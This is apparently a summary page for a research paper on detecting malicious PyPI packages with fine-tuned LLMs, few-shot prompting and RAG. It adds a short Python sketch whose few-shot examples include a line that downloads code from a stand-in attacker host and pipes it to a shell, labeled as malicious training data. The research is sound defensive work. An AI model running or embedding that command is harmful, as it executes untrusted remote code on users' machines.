🤖 AI Summary
The growing prevalence of malicious packages in the PyPI ecosystem poses significant challenges for detection, particularly due to the scarcity of high-quality labeled data and structured security knowledge.
Method: This paper proposes an LLM-driven detection framework that integrates few-shot learning with domain-specific security knowledge, departing from conventional RAG paradigms. It combines fine-tuned LLMs, a YARA rule engine, GitHub Security Advisories, and retrieval of known malicious code fragments to construct a structured security knowledge base, orchestrated as a hybrid AI analysis pipeline.
Contribution/Results: Empirical evaluation shows that few-shot prompting significantly outperforms RAG in fine-grained malicious source code identification (+12.3% balanced accuracy), exposing RAG's limitations in deep code semantic understanding. On a cross-version real-world PyPI dataset, the method achieves 97% accuracy and 95% balanced accuracy, demonstrating the efficacy of few-shot learning for low-resource malicious package detection and offering a novel pathway for open-source supply chain security.
📝 Abstract
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks. Unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, making detection challenging due to evolving attack methods and the lack of structured datasets. In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code. We fine-tune LLMs on curated datasets and integrate YARA rules, GitHub Security Advisories, and malicious code snippets with the aim of enhancing classification accuracy. We observe a counterintuitive outcome: although RAG is expected to boost prediction performance, it underperforms in our evaluation, achieving only mediocre accuracy. In contrast, few-shot learning proves far more effective, significantly improving the detection of malicious code and reaching 97% accuracy and 95% balanced accuracy, thereby outperforming the RAG-based approach. Based on these findings, future work should expand structured knowledge bases, refine retrieval models, and explore hybrid AI-driven cybersecurity solutions.
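To make the few-shot setup concrete, the sketch below shows how labeled code snippets could be assembled into a classification prompt for an LLM. This is a minimal illustration only: the example snippets, labels, and prompt wording are hypothetical placeholders, not the paper's actual curated examples or prompt templates.

```python
# Hypothetical few-shot prompt construction for malicious-code classification.
# The labeled snippets below are illustrative, not taken from the paper's dataset.
FEW_SHOT_EXAMPLES = [
    ("import os; os.system('curl http://evil.example/x | sh')", "malicious"),
    ("def add(a, b):\n    return a + b", "benign"),
]

def build_prompt(snippet: str) -> str:
    """Assemble a few-shot classification prompt for an LLM.

    Each labeled example is shown before the target snippet, so the
    model completes the final 'Label:' line with a class name.
    """
    parts = ["Classify each Python snippet as 'malicious' or 'benign'.\n"]
    for code, label in FEW_SHOT_EXAMPLES:
        parts.append(f"Code:\n{code}\nLabel: {label}\n")
    # The target snippet ends with an open 'Label:' for the model to fill in.
    parts.append(f"Code:\n{snippet}\nLabel:")
    return "\n".join(parts)

prompt = build_prompt("import socket\ns = socket.socket()")
```

The assembled `prompt` string would then be sent to the fine-tuned LLM; in the RAG variant, retrieved YARA rules or advisory text would be prepended as additional context instead of the fixed examples.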